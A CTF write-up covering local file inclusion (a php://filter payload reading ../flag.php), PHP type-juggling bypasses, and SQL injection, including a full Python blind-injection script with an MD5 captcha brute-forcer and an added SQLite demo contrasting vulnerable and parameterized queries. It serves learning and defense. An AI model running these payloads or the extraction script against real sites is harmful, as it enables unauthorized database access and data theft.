Overall the challenges fell into 5 categories: warm-up (newbie) questions, local file inclusion (LFI), PHP code audit, SQL injection, and XSS.

LFI

This LFI set wasn't hard. The first one, http://119.29.138.57:12000/, is a giveaway: you quickly spot a file inclusion.

(screenshot omitted here)

Then follow the hint to find the flag.

The second one was also a fairly simple challenge, though I didn't have time to solve it during the game, lol.

You just use a PHP wrapper (php:// pseudo-protocol) to read the file out. (screenshot omitted)

The third one came out in week three and was quite a bit harder; I only worked it out from a senior's write-up.

Here is his write-up: http://heartsky.info/2017/02/06/HCTF-GAME-week3-writeup/

First you notice that the parameter changed from the "file" of the first two challenges to "image", and anything that isn't .jpg comes back as "File not found". So the PHP side is matching on .jpg; the request must contain resource=../flag.php and must also contain resource=jpg. That gives the payload: img=php://filter/resource=jpg/resource=../flag.php

PHP code audit

This was my first time doing code-audit challenges; they were fairly simple.

php1: a leading whitespace character, %0c (form feed), is enough to get past the is_numeric and is_string checks. is_numeric() tolerates leading whitespace (space, tab, newline, carriage return, vertical tab and form feed), so a form feed followed by digits is still numeric while no longer matching the plain digit string.

PHP2: exploit PHP's loose typing by passing two arrays to get past the comparison.

php3: exploit precision overflow by submitting 0.7100000000000000000a. In PHP 5 and 7 a loose comparison of a string against a number only reads the string's leading numeric prefix, so the trailing "a" is ignored and the value is treated as 0.71.

SQL injection

As a web guy I'm not strong at SQL, so for details see my friend hammer's blog

Link: http://hammerorz.com/archives/8.html

And my senior heartsky's blog: http://heartsky.info/2017/02/06/HCTF-GAME-week3-writeup/

I'll just sketch the approach, as notes for myself, lol

sql1: first the classic "universal password" login bypass, which gives the message "flag is in another space"

Then a UNION query to pull the table and column names, and from there the flag

sql2: a numeric injection, exploited via error-based injection

sql3: blind injection; the senior's script, which I have grabbed:

# coding=utf-8
'''
HTTP POST
Blind injection: every request leaks exactly one number (a length, or the
ASCII code of one character) into the first cell of the result table, and
every request first has to solve the page's MD5 captcha.
'''
import hashlib
import re

import requests

url = 'http://45.32.25.65/nweb/sqli3/index.php'
# the injected value is rendered in the first <td> of the result table
pat = '</th></tr><tr><td>(.*?)</td><td>'
headers = {"Cookie": "PHPSESSID=c8qn7ef6lg7pvmof8hnlbhcdb6"}


def getDatabase():
    # length() first, then ascii(substring()) for each position
    payload = "-1 UNION SELECT length(DATABASE()),'user'#"
    databaseLen = getData(payload)
    database = ''
    for i in range(int(databaseLen)):
        payload = "-1 UNION SELECT ascii(substring(DATABASE()," + str(i + 1) + ",1)),'user'#"
        ch = getData(payload)
        database += chr(int(ch))
    print('[*] The current database is ' + database)


def getTables():
    # walk information_schema.tables for the current database, one table per LIMIT offset
    payload = "-1 UNION SELECT count(*),'user' FROM information_schema.tables WHERE table_schema=DATABASE()#"
    tableNumber = getData(payload)
    print('[*] Table number is ' + tableNumber)
    for i in range(int(tableNumber)):
        tableName = ''
        print('[*] Table name ' + str(i) + ': ', end='')
        payload = "-1 UNION SELECT length(table_name),'user' FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT " + str(i) + ",1#"
        tableLen = getData(payload)
        for j in range(int(tableLen)):
            payload = "-1 UNION SELECT ascii(substring(table_name," + str(j + 1) + ",1)),'user' FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT " + str(i) + ",1#"
            ch = getData(payload)
            tableName += chr(int(ch))
        print(tableName)
        getColumns(tableName)


def getColumns(table):
    # same walk over information_schema.columns, restricted to one table
    payload = "-1 UNION SELECT count(*),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "'#"
    columnNumber = getData(payload)
    print('  [*] Column number is ' + columnNumber)
    for i in range(int(columnNumber)):
        columnName = ''
        print('  [*] Column name ' + str(i) + ': ', end='')
        payload = "-1 UNION SELECT length(column_name),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "' LIMIT " + str(i) + ",1#"
        columnLen = getData(payload)
        for j in range(int(columnLen)):
            payload = "-1 UNION SELECT ascii(substring(column_name," + str(j + 1) + ",1)),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "' LIMIT " + str(i) + ",1#"
            ch = getData(payload)
            columnName += chr(int(ch))
        print(columnName)


def getFlag():
    # table and column names come from getTables()/getColumns()
    payload = "-1 UNION SELECT length(flag),'user' FROM hhhhhhctf#"
    flagLen = getData(payload)
    print(flagLen)
    flag = ''
    for i in range(int(flagLen)):
        payload = "-1 UNION SELECT ascii(substring(flag," + str(i + 1) + ",1)),'user' FROM hhhhhhctf#"
        ch = getData(payload)
        flag += chr(int(ch))
        print(flag)
    print('[*] The flag is: ' + flag)


def getData(payload):
    # GET the form first: the page embeds the 4 hex chars that the MD5 of the
    # captcha answer has to start with, right after the string ==' in the HTML
    r = requests.get(url, headers=headers)
    md5 = r.text.split('==\'')[1][0:4]
    code = blasting(md5)
    data = {'id': payload, 'code': code}
    r = requests.post(url, data=data, headers=headers)
    return re.search(pat, r.text).group(1)


def blasting(code):
    # brute-force an integer whose MD5 hex digest starts with the 4 given chars
    for i in range(1000000):
        md5 = hashlib.md5(str(i).encode()).hexdigest()[0:4]
        if md5 == code:
            return i
    return None


def main():
    # uncomment the stages you want; as left here it only tests the captcha cracker
    # getDatabase()
    # getTables()
    # getFlag()
    print(blasting('52c8'))


if __name__ == '__main__':
    main()
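The script above talks to a challenge server that no longer exists. As an added example (not from the original post or from heartsky's write-up), the same length-then-one-character-per-request extraction loop is rerun here against a constructed SQLite stand-in for the vulnerable index.php, using the same response regex, with the hardened parameterized lookup placed beside the vulnerable one. The table name hhhhhhctf is borrowed from the script; the flag text, the users table and the HTML template are made up for the example. SQLite's dialect differs from MySQL's, so the payloads use unicode()/substr() instead of ascii()/substring(), sqlite_master instead of information_schema, and a trailing -- instead of #.

```python
import re
import sqlite3

# Constructed stand-in for the challenge backend (the original host is gone).
# `users` sits behind the vulnerable lookup; `hhhhhhctf` holds the flag, named
# after the table the page's script reads. Flag text is made up.
SEEDED_FLAG = "hctf{sqlite_stand_in_for_week3}"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'admin'), (2, 'guest');
        CREATE TABLE hhhhhhctf (flag TEXT);
        INSERT INTO hhhhhhctf VALUES ('%s');
    """ % SEEDED_FLAG)
    return conn


# Made-up result table; the regex is the one the page's script uses.
ROW_TEMPLATE = "<table><tr><th>id</th><th>name</th></tr><tr><td>%s</td><td>%s</td></tr></table>"
PAT = re.compile(r"</th></tr><tr><td>(.*?)</td><td>")


def vulnerable_lookup(conn, user_id):
    """Deliberately vulnerable: `id` is concatenated into the query, as in the challenge."""
    sql = "SELECT id, name FROM users WHERE id = " + user_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "<p>error</p>"
    return ROW_TEMPLATE % row if row else "<p>not found</p>"


def safe_lookup(conn, user_id):
    """Hardened form: a bound parameter, so the payload is compared as a value, never parsed as SQL."""
    row = conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchone()
    return ROW_TEMPLATE % row if row else "<p>not found</p>"


def get_data(conn, payload, lookup=vulnerable_lookup):
    """One 'request': inject into `id`, return whatever lands in the first cell (None if nothing does)."""
    m = PAT.search(lookup(conn, payload))
    return m.group(1) if m else None


def dump_expr(conn, expr, from_clause=""):
    """Read the string value of `expr` one character per request: length() first,
    then one unicode(substr()) per position, exactly the loop shape of the page's script."""
    n = int(get_data(conn, "-1 UNION SELECT length(%s),'x' %s-- " % (expr, from_clause)))
    chars = []
    for i in range(1, n + 1):
        code = get_data(conn, "-1 UNION SELECT unicode(substr(%s,%d,1)),'x' %s-- " % (expr, i, from_clause))
        chars.append(chr(int(code)))
    return "".join(chars)


def dump_tables(conn):
    """Enumerate user tables via sqlite_master. LIMIT/OFFSET live in a subselect so they
    bind to that SELECT alone; a LIMIT on the UNION itself would apply to the whole
    (sorted, de-duplicated) compound result and scramble the per-character reads."""
    count = int(get_data(conn, "-1 UNION SELECT count(*),'x' FROM sqlite_master WHERE type='table'-- "))
    tables = []
    for i in range(count):
        sub = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY rowid LIMIT 1 OFFSET %d)" % i
        tables.append(dump_expr(conn, "name", "FROM " + sub))
    return tables


def dump_flag(conn):
    return dump_expr(conn, "flag", "FROM hhhhhhctf")


if __name__ == "__main__":
    db = make_db()
    print("tables:", dump_tables(db))
    print("flag:  ", dump_flag(db))
    print("hardened endpoint yields:", get_data(db, "-1 UNION SELECT 1,'x'-- ", safe_lookup))
```

Against the hardened lookup the same payload is bound as a text value, the INTEGER column never matches it, and the regex finds nothing to extract; the cost of the attack side is unchanged, one request per character plus one per length, which is why the original script also has to crack a captcha on every single request.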